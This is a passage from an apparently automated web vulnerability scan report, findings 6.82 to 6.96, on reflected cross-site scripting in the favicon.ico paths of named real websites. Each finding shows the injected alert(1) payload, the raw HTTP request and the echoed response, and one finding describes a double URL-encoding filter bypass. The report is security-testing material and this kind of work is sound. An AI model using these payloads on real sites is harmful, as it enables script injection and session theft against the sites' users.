The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /favicon.icof5a25%2522%253e%253ca%2520b%253dc%253e1df3e30028f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rent.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:35:49 GMT
Server: Apache
Set-Cookie: session=10126565fabf461a6858b2961126cae8/1301751350/be94a764a1841ff093210115435aab78; domain=.rent.com; path=/
Set-Cookie: RD=; path=/; expires=Sat, 02-Apr-2011 13:36:20 GMT
Cache-Control: must-revalidate
Expires: Sat, 02 Apr 2011 13:35:51 GMT
Last-Modified: Sat, 02 Apr 2011 13:35:50 GMT
Set-Cookie: browser=1.2046613017513502; path=/; expires=Tue, 30-Mar-21 13:35:50 GMT; domain=.rent.com
P3P: CP='ALL DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONo OUR IND PHY ONL UNI COM NAV INT STA'
Content-Type: text/html; charset=utf-8
X-Cache: MISS from www.rent.com
Content-Length: 20069


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en" class="no-js">
<head>
<title>Error 404: Page Not Found</title>

<link href="http://media.rent.com/css/renter.css?v=8297
...[SNIP]...
<a id="topbar_signin_link_id" class="topbar_signin_link" href="/account/login/" linkname="GlobalHeader_SignIn_Link" rel="/favicon.icof5a25"><a b=c>1df3e30028f">
...[SNIP]...

6.82. http://www.reverbnation.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reverbnation.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3eefb<img%20src%3da%20onerror%3dalert(1)>8088e5a0514 was submitted in the REST URL parameter 1. This input was echoed as 3eefb<img src=a onerror=alert(1)>8088e5a0514 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.ico3eefb<img%20src%3da%20onerror%3dalert(1)>8088e5a0514 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reverbnation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:41:53 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8n-fips Phusion_Passenger/3.0.4
X-Powered-By:
Cache-Control: no-cache
Set-Cookie: _session_id=bdfe329ab8b312ccf2f484a799176e11; domain=reverbnation.com; path=/; HttpOnly
Content-Length: 21673
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerCust15535_http_new=4032917968.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a href="/main/global_search?q=favicon.ico3eefb%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8088e5a0514" rel="nofollow">Search for 'favicon.ico3eefb<img src=a onerror=alert(1)>8088e5a0514'</a>
...[SNIP]...

6.83. http://www.shangri-la.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shangri-la.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 682d8'%3b026f574dde7 was submitted in the REST URL parameter 1. This input was echoed as 682d8';026f574dde7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico682d8'%3b026f574dde7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shangri-la.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-WebServer-By: WEB02
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://www.shangri-la.com
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 15288
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Sat, 02 Apr 2011 13:45:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
<script type="text/javascript">
   var share_page_data={};
   share_page_data.page_url = 'http://www.shangri-la.com/Error404.aspx?404;http://www.shangri-la.com:80/favicon.ico682d8';026f574dde7';
   share_page_data.page_name = "Page Not Found";
</script>
...[SNIP]...

6.84. http://www.shopcompanion.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1ca3b<img%20src%3da%20onerror%3dalert(1)>4816534cea1 was submitted in the REST URL parameter 1. This input was echoed as 1ca3b<img src=a onerror=alert(1)>4816534cea1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /1ca3b<img%20src%3da%20onerror%3dalert(1)>4816534cea1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopcompanion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 14:01:14 GMT
Content-Type: text/html; charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR NID CURa OUR NOR PHY UNI DEM PRE"
Set-Cookie: AMOS_SID=_live_ticks%3D1301752873832%26live%3DOEzzw%252Eh~XWhkUXWWzxjwVzhxexzYwVqzjWYUkqWwwmXezhmzm; Path=/; Domain=.shopcompanion.com;
Set-Cookie: AMOS_NS_ID=048; Path=/; Domain=.shopcompanion.com;
Set-Cookie: CC_SRCID=369; Path=/; Domain=www.shopcompanion.com;
Set-Cookie: AMID=2232139994; Path=/; Domain=.shopcompanion.com; Expires=Tuesday, 01-Jan-38 00:00:01 GMT
Set-Cookie: CATALOGCITY_SSNLIVE111=2232139994; Path=/; Domain=.shopcompanion.com;
Set-Cookie: SHOPPER_LOCATION=Monterey%2C+CA%2C+93940%2C+36%2E600111%2C+-121%2E894521%2C+30; Path=/; Domain=www.shopcompanion.com;
Content-Length: 107216

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="stylesheet" t
...[SNIP]...
<span class="span tx_bold">> 1ca3b<img src=a onerror=alert(1)>4816534cea1</span>
...[SNIP]...

6.85. http://www.smarter.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.smarter.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c2201<a>26331e04736 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /c2201<a>26331e04736 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smarter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:23 GMT
Server: Apache
Loader-Time-Used: 0.00018
Set-Cookie: __mmsid=d9c2a77556a5d7bf53b16231f5cfac85; path=/; domain=.smarter.com
Set-Cookie: __mmspn=deleted; expires=Fri, 02-Apr-2010 13:33:22 GMT; path=/; domain=.smarter.com
Set-Cookie: __mmoff=deleted; expires=Fri, 02-Apr-2010 13:33:22 GMT; path=/; domain=.smarter.com
Set-Cookie: __mmuid=66a6612fe3ea8c94b39704425bd47fba; expires=Sat, 02-Apr-2016 13:33:23 GMT; path=/; domain=.smarter.com
Set-Cookie: __mmtrk=-1|||3|4ecd93f7c006897fc2035eac37f86a5b|AwA%3D|0y9O1dUtLNRNNjIyMFQ1MjV2TgSRrkZmxsaGqQYm5sZmehkluTkA; path=/; domain=.smarter.com
Set-Cookie: qry_lnk=deleted; expires=Fri, 02-Apr-2010 13:33:23 GMT; path=/; domain=.smarter.com
Set-Cookie: qry_ctxt=deleted; expires=Fri, 02-Apr-2010 13:33:23 GMT; path=/; domain=.smarter.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 93179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> c2201<A>26331e04736
...[SNIP]...
<h2>How to Shop Smarter for c2201<a>26331e04736: </h2>
...[SNIP]...

6.86. http://www.soft82.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soft82.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 99137<script>alert(1)</script>cb264ab5f87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico99137<script>alert(1)</script>cb264ab5f87 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.soft82.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:16:15 GMT
Server: Apache/1.3.42 (Unix) PHP/5.3.4 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=d833dc533a466d6bfc13ec777b9775ab; path=/; domain=.soft82.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 87349

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<BASE href="http://www.soft82.com/">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>
...[SNIP]...
<strong>www.soft82.com/favicon.ico99137<script>alert(1)</script>cb264ab5f87</strong>
...[SNIP]...

6.87. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.songmeanings.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7297a"-alert(1)-"4c63be965d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico7297a"-alert(1)-"4c63be965d1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.songmeanings.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:14:05 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=8v774711o8lea5jaf5624ak142; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23886


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
   <ti
...[SNIP]...
<script type="text/javascript">
// Note: it's important to keep these in separate script blocks
COMSCORE.beacon({
   c1: 2,
   c2: "6772046",
   c3: "",
   c4: "http://www.songmeanings.net/favicon.ico7297a"-alert(1)-"4c63be965d1", // Replace this with the page URL that the site is on here, and also enter it into the <noscript>
...[SNIP]...

6.88. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.songmeanings.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 427ff"><script>alert(1)</script>13601e9ef95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico427ff"><script>alert(1)</script>13601e9ef95 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.songmeanings.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:13:57 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=c3e6n99ocvojajgu9q9r37uep5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23916


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
   <ti
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6772046&c3=&c4=www.songmeanings.net/favicon.ico427ff"><script>alert(1)</script>13601e9ef95&c5=&c6=&c15=&cj=1" />
...[SNIP]...

6.89. http://www.spike.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.spike.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78520"><script>alert(1)</script>dd39ddafe43 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico78520"><script>alert(1)</script>dd39ddafe43 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.spike.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Cache-Control: max-age=1800
Date: Sat, 02 Apr 2011 13:31:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:44 GMT; path=/
Vary: User-Agent
Content-Length: 33753


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="
...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/spike.com?url=/favicon.ico78520"><script>alert(1)</script>dd39ddafe43&pageType=&cmsPageId=&show=&title=&season=&photoTitle=&spikeTvShow=&channel=" type="text/javascript">
...[SNIP]...

6.90. http://www.supercheats.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supercheats.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0247"%3balert(1)//9ef130d939d was submitted in the REST URL parameter 1. This input was echoed as c0247";alert(1)//9ef130d939d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc0247"%3balert(1)//9ef130d939d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.supercheats.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:43:02 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script>

COMSCORE.beacon({

c1:2,

c2:"6035764",

c3:"",

c4:"http://www.supercheats.com/favicon.icoc0247";alert(1)//9ef130d939d",

c5:"",

c6:"",

c15:""

});

</script>
...[SNIP]...

6.91. http://www.tarot.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tarot.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3ca5'-alert(1)-'190ef52e03b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe3ca5'-alert(1)-'190ef52e03b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tarot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:15:10 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:15:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=rkucms4dupord0ov1fcq4vql54; expires=Sun, 01 Apr 2012 14:15:10 GMT; path=/; domain=.tarot.com
Set-Cookie: BCKPHPSESSID=rkucms4dupord0ov1fcq4vql54; expires=Sat, 23-Apr-2011 14:15:10 GMT; path=/
Set-Cookie: userStatObj=Tzo4OiJ1c2VyRGF0YSI6Nzp7czoxMToiY29va2llX25hbWUiO3M6MTE6InVzZXJTdGF0T2JqIjtzOjk6Im1lbWJlcl9pZCI7aTowO3M6MTM6InJlZmVycmVkX2Zyb20iO2E6MDp7fXM6MTA6Imxhc3RfdmlzaXQiO2k6MTMwMTc1MzcxMDtzOjk6Im5vX3Zpc2l0cyI7aToxO3M6MTg6Im5vX3NhbXBsZV9yZWFkaW5ncyI7aTowO3M6MTg6Im5vX2V4cGVydF9yZWFkaW5ncyI7aTowO30%253D; expires=Fri, 01-Jul-2011 14:15:10 GMT; path=/; domain=www.tarot.com
Set-Cookie: luser=rkucms4dupord0ov1fcq4vql54%3A0%3A%3A%3A; expires=Fri, 01-Jul-2011 14:15:10 GMT; path=/; domain=www.tarot.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 26394

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<link rel="SHORTCUT ICON" href="/favicon.ico">
<!-- ####################################
/favicon.icoe3ca5'-alert(1)-'190ef
...[SNIP]...

var random3 = Math.round( Math.random() * 5000230 );

       var URL = ''
           + '&sid=rkucms4dupord0ov1fcq4vql54'
           + '&uid='
           + '&pid=a-self-no'
           + '&site=tarot'
           + '&pg=/favicon.icoe3ca5'-alert(1)-'190ef52e03b'
           + '&pq='
           + '&rf='
           + '&ftr='
           + '&rq='
           + '&res=' + screen.width + 'x' + screen.height
           + '&col=' + c
           + '&brws=' + escape(navigator.appName)
           + '&brv=' + escape(navigator.appVersio
...[SNIP]...

6.92. http://www.tarot.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tarot.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 2e1a2--><script>alert(1)</script>539e602d394 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico2e1a2--><script>alert(1)</script>539e602d394 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tarot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:15:12 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:15:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=768ks8blt3b6jg5qpk26lbenk6; expires=Sun, 01 Apr 2012 14:15:12 GMT; path=/; domain=.tarot.com
Set-Cookie: BCKPHPSESSID=768ks8blt3b6jg5qpk26lbenk6; expires=Sat, 23-Apr-2011 14:15:12 GMT; path=/
Set-Cookie: userStatObj=Tzo4OiJ1c2VyRGF0YSI6Nzp7czoxMToiY29va2llX25hbWUiO3M6MTE6InVzZXJTdGF0T2JqIjtzOjk6Im1lbWJlcl9pZCI7aTowO3M6MTM6InJlZmVycmVkX2Zyb20iO2E6MDp7fXM6MTA6Imxhc3RfdmlzaXQiO2k6MTMwMTc1MzcxMztzOjk6Im5vX3Zpc2l0cyI7aToxO3M6MTg6Im5vX3NhbXBsZV9yZWFkaW5ncyI7aTowO3M6MTg6Im5vX2V4cGVydF9yZWFkaW5ncyI7aTowO30%253D; expires=Fri, 01-Jul-2011 14:15:13 GMT; path=/; domain=www.tarot.com
Set-Cookie: luser=768ks8blt3b6jg5qpk26lbenk6%3A0%3A%3A%3A; expires=Fri, 01-Jul-2011 14:15:13 GMT; path=/; domain=www.tarot.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 26531

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<link rel="SHORTCUT ICON" href="/favicon.ico">
<!-- ####################################
/favicon.ico2e1a2--><script>alert(1)</script>539e602d394
copyright 1999-2011, Visionary Networks
10.3.1.24
#################################### -->
...[SNIP]...

6.93. http://www.tarot.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tarot.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6937"><script>alert(1)</script>27a4d5e9b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob6937"><script>alert(1)</script>27a4d5e9b5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tarot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:15:06 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:15:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=rkh1871d7jsqqnuv8sjhgil1f0; expires=Sun, 01 Apr 2012 14:15:07 GMT; path=/; domain=.tarot.com
Set-Cookie: BCKPHPSESSID=rkh1871d7jsqqnuv8sjhgil1f0; expires=Sat, 23-Apr-2011 14:15:07 GMT; path=/
Set-Cookie: userStatObj=Tzo4OiJ1c2VyRGF0YSI6Nzp7czoxMToiY29va2llX25hbWUiO3M6MTE6InVzZXJTdGF0T2JqIjtzOjk6Im1lbWJlcl9pZCI7aTowO3M6MTM6InJlZmVycmVkX2Zyb20iO2E6MDp7fXM6MTA6Imxhc3RfdmlzaXQiO2k6MTMwMTc1MzcwNztzOjk6Im5vX3Zpc2l0cyI7aToxO3M6MTg6Im5vX3NhbXBsZV9yZWFkaW5ncyI7aTowO3M6MTg6Im5vX2V4cGVydF9yZWFkaW5ncyI7aTowO30%253D; expires=Fri, 01-Jul-2011 14:15:07 GMT; path=/; domain=www.tarot.com
Set-Cookie: luser=rkh1871d7jsqqnuv8sjhgil1f0%3A0%3A%3A%3A; expires=Fri, 01-Jul-2011 14:15:07 GMT; path=/; domain=www.tarot.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 26518

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<link rel="SHORTCUT ICON" href="/favicon.ico">
<!-- ####################################
/favicon.icob6937"><script>alert(1
...[SNIP]...
<INPUT TYPE="hidden" NAME="returnUrl" VALUE="/favicon.icob6937"><script>alert(1)</script>27a4d5e9b5">
...[SNIP]...

6.94. http://www.thedailybeast.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4df34"><script>alert(1)</script>277514e1af2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4df34"><script>alert(1)</script>277514e1af2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thedailybeast.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 02 Apr 2011 13:40:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/favicon.ico4df34"><script>alert(1)</script>277514e1af2"/>
...[SNIP]...

6.95. http://www.thedailyshow.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailyshow.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4544"><script>alert(1)</script>da6a196bf6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc4544"><script>alert(1)</script>da6a196bf6a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thedailyshow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Type: text/html;charset=utf-8
Content-Length: 26317
Cache-Control: max-age=1800
Date: Sat, 02 Apr 2011 13:31:49 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title></title>
       <meta name="description" content=
...[SNIP]...
<link rel="canonical" href="http://www.thedailyshow.com/favicon.icoc4544"><script>alert(1)</script>da6a196bf6a" />
...[SNIP]...

6.96. http://www.thehollywoodgossip.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thehollywoodgossip.com
Path:   /favicon.ico

Issue detail

